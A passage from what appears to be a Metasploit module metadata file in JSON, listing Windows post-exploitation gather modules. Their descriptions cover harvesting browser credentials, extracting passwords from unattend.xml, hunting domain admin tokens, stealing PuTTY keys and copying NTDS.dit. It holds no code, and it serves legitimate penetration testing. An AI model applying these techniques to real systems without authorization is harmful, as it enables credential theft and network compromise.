"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Carlos Perez <carlos_perez@darkoperator.com>",
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will enumerate user accounts in the default Active Directory (AD) domain and store\n them in the database. If GROUP_MEMBER is set to the DN of a group, this will list the members of\n that group by performing a recursive/nested search (i.e. it will list users who are members of\n groups that are members of groups that are members of groups (etc) which eventually include the\n target group DN).",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ad_users.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_users",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_applications": {
"name": "Windows Gather Installed Application Enumeration",
"full_name": "post/windows/gather/enum_applications",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will enumerate all installed applications",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_applications.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_applications",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_artifacts": {
"name": "Windows Gather File and Registry Artifacts Enumeration",
"full_name": "post/windows/gather/enum_artifacts",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"averagesecurityguy <stephen@averagesecurityguy.info>"
],
"description": "This module will check the file system and registry for particular artifacts. The\n list of artifacts is read from data/post/enum_artifacts_list.txt or a user specified file. Any\n matches are written to the loot.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_artifacts.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_artifacts",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_av_excluded": {
"name": "Windows Antivirus Exclusions Enumeration",
"full_name": "post/windows/gather/enum_av_excluded",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Andrew Smith",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module will enumerate the file, directory, process and\n extension-based exclusions from supported AV products, which\n currently includes Microsoft Defender, Microsoft Security\n Essentials/Antimalware, and Symantec Endpoint Protection.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_av_excluded.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_av_excluded",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_chrome": {
"name": "Windows Gather Google Chrome User Data Enumeration",
"full_name": "post/windows/gather/enum_chrome",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Sven Taute",
"sinn3r <sinn3r@metasploit.com>",
"Kx499",
"mubix <mubix@hak5.org>"
],
"description": "This module will collect user data from Google Chrome and attempt to decrypt\n sensitive information.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-27 07:41:06 +0000",
"path": "/modules/post/windows/gather/enum_chrome.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_chrome",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_computers": {
"name": "Windows Gather Enumerate Computers",
"full_name": "post/windows/gather/enum_computers",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module will enumerate computers included in the primary Domain.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_computers.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_computers",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_db": {
"name": "Windows Gather Database Instance Enumeration",
"full_name": "post/windows/gather/enum_db",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Barry Shteiman <barry@sectorix.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module will enumerate a windows system for installed database instances",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_db.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_db",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_devices": {
"name": "Windows Gather Hardware Enumeration",
"full_name": "post/windows/gather/enum_devices",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "Enumerate PCI hardware information from the registry. Please note this script\n will run through registry subkeys such as: 'PCI', 'ACPI', 'ACPI_HAL', 'FDC', 'HID',\n 'HTREE', 'IDE', 'ISAPNP', 'LEGACY', 'LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW',\n and 'USB'; it will take time to finish. It is recommended to run this module as a\n background job.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_devices.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_devices",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_dirperms": {
"name": "Windows Gather Directory Permissions Enumeration",
"full_name": "post/windows/gather/enum_dirperms",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kx499",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module enumerates directories and lists the permissions set\n on found directories. Please note: if the PATH option isn't specified,\n then the module will start by enumerating whatever is in the target machine's\n %PATH% variable.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_dirperms.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_dirperms",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_domain": {
"name": "Windows Gather Enumerate Domain",
"full_name": "post/windows/gather/enum_domain",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module identifies the primary domain via the registry. The registry value used is:\n HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_domain.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_domain",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_domain_group_users": {
"name": "Windows Gather Enumerate Domain Group",
"full_name": "post/windows/gather/enum_domain_group_users",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"Stephen Haywood <haywoodsb@gmail.com>"
],
"description": "This module extracts user accounts from the specified group\n and stores the results in the loot. It will also verify whether the session\n account is in the group. Data is stored in loot in a format that\n is compatible with the token_hunter plugin. This module should be\n run over a session with domain credentials.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_domain_group_users.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_domain_group_users",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_domain_tokens": {
"name": "Windows Gather Enumerate Domain Tokens",
"full_name": "post/windows/gather/enum_domain_tokens",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will enumerate tokens present on a system that are part of the\n domain the target host is a member of. It will also enumerate users in the local\n Administrators, Users and Backup Operators groups to identify Domain members.\n Processes will also be enumerated and checked to see whether they are running under a\n Domain account. In all checks the accounts, processes and tokens will be\n checked to see whether they are part of the Domain Admins group of the domain the machine\n is a member of.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_domain_tokens.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_domain_tokens",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_domain_users": {
"name": "Windows Gather Enumerate Active Domain Users",
"full_name": "post/windows/gather/enum_domain_users",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Etienne Stalmans <etienne@sensepost.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will enumerate computers included in the primary Domain and attempt\n to list all locations the targeted user has sessions on. If the HOST option is specified\n the module will target only that host. If the HOST is specified and USER is set to nil, all users\n logged into that host will be returned.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/gather/enum_domain_users.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_domain_users",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_domains": {
"name": "Windows Gather Domain Enumeration",
"full_name": "post/windows/gather/enum_domains",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module enumerates the domains a host can currently see and the domain\n controllers for each of those domains.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_domains.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_domains",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_emet": {
"name": "Windows Gather EMET Protected Paths",
"full_name": "post/windows/gather/enum_emet",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vysec <vincent.yiu@mwrinfosecurity.com>"
],
"description": "This module will enumerate the EMET protected paths on the target host.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_emet.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_emet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_files": {
"name": "Windows Gather Generic File Collection",
"full_name": "post/windows/gather/enum_files",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"3vi1john <Jbabio@me.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module downloads files recursively based on the FILE_GLOBS option.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_files.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_files",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_hostfile": {
"name": "Windows Gather Windows Host File Enumeration",
"full_name": "post/windows/gather/enum_hostfile",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vt <nick.freeman@security-assessment.com>"
],
"description": "This module returns a list of entries in the target system's hosts file.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_hostfile.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_hostfile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ie": {
"name": "Windows Gather Internet Explorer User Data Enumeration",
"full_name": "post/windows/gather/enum_ie",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kx499"
],
"description": "This module will collect history, cookies, and credentials (from either HTTP\n auth passwords, or saved form passwords found in auto-complete) in\n Internet Explorer. The ability to gather credentials is only supported\n for versions of IE >=7, while history and cookies can be extracted for all\n versions.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ie.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ie",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_logged_on_users": {
"name": "Windows Gather Logged On User Enumeration (Registry)",
"full_name": "post/windows/gather/enum_logged_on_users",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will enumerate current and recently logged on Windows users",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_logged_on_users.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_logged_on_users",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ms_product_keys": {
"name": "Windows Gather Product Key",
"full_name": "post/windows/gather/enum_ms_product_keys",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module will enumerate the OS license key",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-24 16:06:55 +0000",
"path": "/modules/post/windows/gather/enum_ms_product_keys.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ms_product_keys",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_muicache": {
"name": "Windows Gather Enum User MUICache",
"full_name": "post/windows/gather/enum_muicache",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"TJ Glad <tjglad@cmail.nu>"
],
"description": "This module gathers information about the files and file paths that logged on users have\n executed on the system. It also will check if the file still exists on the system. This\n information is gathered by using information stored under the MUICache registry key. If\n the user is logged in when the module is executed it will collect the MUICache entries\n by accessing the registry directly. If the user is not logged in the module will download\n users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are\n parsed from the downloaded hive.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_muicache.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_muicache",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_patches": {
"name": "Windows Gather Applied Patches",
"full_name": "post/windows/gather/enum_patches",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"zeroSteiner <zeroSteiner@gmail.com>",
"mubix <mubix@hak5.org>"
],
"description": "This module will attempt to enumerate which patches are applied to a windows system\n based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/aa394391(v=vs.85).aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-02 15:33:48 +0000",
"path": "/modules/post/windows/gather/enum_patches.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_patches",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_powershell_env": {
"name": "Windows Gather Powershell Environment Setting Enumeration",
"full_name": "post/windows/gather/enum_powershell_env",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will enumerate Microsoft Powershell settings",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_powershell_env.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_powershell_env",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_prefetch": {
"name": "Windows Gather Prefetch File Information",
"full_name": "post/windows/gather/enum_prefetch",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"TJ Glad <tjglad@cmail.nu>"
],
"description": "This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems\n and current values of related registry keys. From each prefetch file we'll collect\n filetime (converted to utc) of the last execution, file path hash, run count, filename\n and the execution path.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_prefetch.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_prefetch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_proxy": {
"name": "Windows Gather Proxy Setting",
"full_name": "post/windows/gather/enum_proxy",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module pulls a user's proxy settings. If neither RHOST or SID\n are set it pulls the current user, else it will pull the user's settings\n specified SID and target host.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_proxy.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_proxy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_putty_saved_sessions": {
"name": "PuTTY Saved Sessions Enumeration Module",
"full_name": "post/windows/gather/enum_putty_saved_sessions",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session\n information from the registry. PuTTY is very configurable; some users may have configured\n saved sessions which could include a username, private key file to use when authenticating,\n host name etc. If a private key is configured, an attempt will be made to download and store\n it in loot. It will also record the SSH host keys which have been stored. These will be connections that\n the user has previously made after accepting the host's SSH fingerprint and therefore are of particular\n interest if they are within scope of a penetration test.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_putty_saved_sessions.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_putty_saved_sessions",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_services": {
"name": "Windows Gather Service Info Enumeration",
"full_name": "post/windows/gather/enum_services",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Keith Faber",
"Kx499"
],
"description": "This module will query the system for services and display name and\n configuration info for each returned service. It allows you to\n optionally search the credentials, path, or start type for a string\n and only return the results that match. These query operations are\n cumulative and if no query strings are specified, it just returns all\n services. NOTE: If the script hangs, windows firewall is most likely\n on and you did not migrate to a safe process (explorer.exe for\n example).",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_services.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_services",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_shares": {
"name": "Windows Gather SMB Share Enumeration via Registry",
"full_name": "post/windows/gather/enum_shares",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will enumerate configured and recently used file shares",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_shares.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_shares",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_snmp": {
"name": "Windows Gather SNMP Settings Enumeration (Registry)",
"full_name": "post/windows/gather/enum_snmp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"Tebo <tebo@attackresearch.com>"
],
"description": "This module will enumerate the SNMP service configuration",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_snmp.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_snmp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_termserv": {
"name": "Windows Gather Terminal Server Client Connection Information Dumper",
"full_name": "post/windows/gather/enum_termserv",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module dumps MRU and connection data for RDP sessions",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_termserv.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_termserv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_tokens": {
"name": "Windows Gather Enumerate Domain Admin Tokens (Token Hunter)",
"full_name": "post/windows/gather/enum_tokens",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module will identify systems that have a Domain Admin (delegation) token\n on them. The module will first check if sufficient privileges are present for\n certain actions, and run getprivs for system. If you elevated privs to system,\n the SeAssignPrimaryTokenPrivilege will not be assigned, in that case try\n migrating to another process that is running as system. If no sufficient\n privileges are available, the script will not continue.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_tokens.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_tokens",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_tomcat": {
"name": "Windows Gather Apache Tomcat Enumeration",
"full_name": "post/windows/gather/enum_tomcat",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Barry Shteiman <barry@sectorix.com>"
],
"description": "This module will collect information from a Windows-based Apache Tomcat. You will get\n information such as: The installation path, Tomcat version, port, web applications,\n users, passwords, roles, etc.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_tomcat.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_tomcat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_trusted_locations": {
"name": "Windows Gather Microsoft Office Trusted Locations",
"full_name": "post/windows/gather/enum_trusted_locations",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vysec <vincent.yiu@mwrinfosecurity.com>"
],
"description": "This module will enumerate the Microsoft Office trusted locations on the target host.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_trusted_locations.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_trusted_locations",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_unattend": {
"name": "Windows Gather Unattended Answer File Enumeration",
"full_name": "post/windows/gather/enum_unattend",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Sean Verity <veritysr1980@gmail.com>",
"sinn3r <sinn3r@metasploit.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will check the file system for a copy of unattend.xml and/or autounattend.xml, found on Windows Vista and newer Windows systems, and then extract sensitive information such as usernames and decoded passwords.",
"references": [
"URL-http://technet.microsoft.com/en-us/library/ff715801",
"URL-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx",
"URL-http://technet.microsoft.com/en-us/library/c026170e-40ef-4191-98dd-0b9835bfa580"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_unattend.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_unattend",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/file_from_raw_ntfs": {
"name": "Windows File Gather File from Raw NTFS",
"full_name": "post/windows/gather/file_from_raw_ntfs",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Danil Bazin <danil.bazin@hsc.fr>"
],
"description": "This module gathers a file by reading the raw NTFS device, bypassing some Windows restrictions such as files held open with an exclusive (write) lock. Because it avoids the usual file locking issues, it can be used to retrieve files such as NTDS.dit.",
"references": [
"URL-http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/file_from_raw_ntfs.rb",
"is_install_path": true,
"ref_name": "windows/gather/file_from_raw_ntfs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/forensics/browser_history": {
"name": "Windows Gather Skype, Firefox, and Chrome Artifacts",
"full_name": "post/windows/gather/forensics/browser_history",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joshua Harper <josh@radixtx.com>"
],
"description": "Gathers Skype chat logs, Firefox history, and Chrome history data from the target machine.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/forensics/browser_history.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/browser_history",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/forensics/duqu_check": {
"name": "Windows Gather Forensics Duqu Registry Check",
"full_name": "post/windows/gather/forensics/duqu_check",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Marcus J. Carey <mjc@threatagent.com>"
],
"description": "This module searches for CVE-2011-3402 (Duqu) related registry artifacts.",
"references": [
"CVE-2011-3402",
"URL-http://r-7.co/w5h7fY"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/forensics/duqu_check.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/duqu_check",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/forensics/enum_drives": {
"name": "Windows Gather Physical Drives and Logical Volumes",
"full_name": "post/windows/gather/forensics/enum_drives",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Wesley McGrew <wesley@mcgrewsecurity.com>"
],
"description": "This module will list physical drives and logical volumes",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/forensics/enum_drives.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/enum_drives",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/forensics/imager": {
"name": "Windows Gather Forensic Imaging",
"full_name": "post/windows/gather/forensics/imager",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Wesley McGrew <wesley@mcgrewsecurity.com>"
],
"description": "This module will perform byte-for-byte imaging of remote disks and volumes",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/forensics/imager.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/imager",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/forensics/nbd_server": {
"name": "Windows Gather Local NBD Server",
"full_name": "post/windows/gather/forensics/nbd_server",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
